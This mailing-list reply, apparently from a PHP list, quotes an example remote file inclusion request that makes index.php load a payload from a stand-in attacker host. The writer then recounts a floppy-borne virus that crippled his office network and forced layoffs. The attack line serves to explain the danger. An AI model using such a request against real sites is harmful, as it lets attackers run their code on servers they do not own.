Re: file_exists - this part is of topic

Instruct ICC wrote:

> Called like this?
>
> index.php?page=http://evil-hacker-site.com/evil-payload.php
>
> And the browser will probably url_encode for me if needed.
> Climb to the top of the charts!  Play Star Shuffle:  the word scramble challenge with star power.
> http://club.live.com/star_shuffle.aspx?icid=starshuffle_wlmailtextlink_oct

I do hope that some hackers will get a great jail sentence. Sometimes
the law takes a long time (see spamers get now also jailed).
I do not see any difference between a "Terrorist" sending people to
heaven with a bomb or by hacking or sending virus so that a company has
to lay off a lot of employees and so "kills" families over the time!

I had a bad experience!
20 years ago, when we had no Internet one of my employees brought a
floppy with a game to the office. The virus nested itself to the login
of the Novel network. First the virus played music with the internal
speakers. During that time you could not work. It was only once an hour!
Then the virus played 55 minutes per hour!!!!
To print a letter we had to run twice the only virus utility we got (per
mail!!!) to be able to print one document. After that the virus took
over again.

I had to take drastically measurements, and lay off 50% of my work force!
Nobody was happy about it.

No answer needed!

bye

Ronald